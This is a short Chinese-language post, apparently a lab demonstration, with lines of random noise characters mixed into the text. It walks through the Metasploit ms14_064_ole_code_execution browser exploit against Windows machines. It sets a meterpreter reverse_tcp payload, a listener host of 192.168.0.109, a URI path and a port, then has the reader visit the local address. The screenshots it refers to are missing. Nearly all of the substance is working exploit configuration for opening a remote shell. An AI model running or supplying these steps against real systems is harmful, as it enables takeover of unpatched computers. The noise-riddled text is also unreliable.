; L3 B/ v. ^; h' u! K& C
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
0 d! Q% @$ d0 i' m6 V$ R& Z. k& V
! i% E4 r) i4 L0 Q8 ^, e s
" |8 _. k X$ x5 K 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ) S w( e( J% I6 L5 c) P3 ]5 S, G+ {
* C3 A$ |; M! E% F C# Q5 L8 D% }# u
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: Z. n0 ^% u, |9 R& L! i
+ W9 ^1 M$ S4 b% E5 g( M, F R& i9 C+ \1 q" ^& F) }
set AllowPowershellPrompt true, Y6 H+ m3 h, n- }- q( C. ?6 i
: ]! }0 P' Q. \+ f7 W
Q. Z6 c; s, P( T Set LHOST 192.168.0.109
$ ~( I5 W: i5 F0 Q1 q! I4 f
. y a: D3 r, M8 F
|! o6 B$ U' V9 M set SRVHOST 192.168.0.109
) s" X I& E& x) ^' s" e$ U/ |+ o
- R2 }( x; L- J* E- V9 g
1 v# |4 D2 x' p8 {, E, |5 m Set uripath share' k* ?, U; }; F/ h
4 F( T+ Q" F9 [5 r( o6 B6 o
. `) S9 P% M& C( O Set srvport 805 L7 E% U- W. q8 f% z0 I6 ]+ {# P
7 `8 O# x( c' ~/ }/ s4 @
( D: E; n0 g: ^& O. X. a
4 F+ t( V% f- i$ B6 ~& e
8 p4 S) b) G- L+ X
7 Y3 ~: X: U. @/ n ) S+ A4 ]& ]. \( F5 b4 Z7 V
8 ?; a U7 k8 O6 W+ H5 n
Z0 _& \0 X, ]: X" C- k) N
9 ~/ B2 t3 A7 @: ^
+ b! X N* O- |# ?% u
( d. x9 d* H0 T) |% d z
+ E3 C6 s( d0 e7 L" s- B) Y; }
) l5 D' J& c" F
0 H2 {( d* I" C% r' m0 F; i: b
0 [# `$ C3 X; F9 a5 j) V$ m
+ P9 \6 J P- H- y- d, |7 _) K
8 A, r' H a2 H N2 s2 [- L
下面我们来访问本地地址如图:
( Z" q2 d q* g
$ t$ d$ X( p0 ^: L' s7 g+ C
8 E* M! ^. X% `% s
0 ]) ?/ D2 Z, ~, K: R
1 b' v" j- D5 j4 V
, A' K# C( y1 p
/ p( L' J0 Z& z, _* T4 n
/ S; [/ b# r) M6 x, _9 D( p' M4 f& H2 v, s" w( B
. ^& z' S) z& c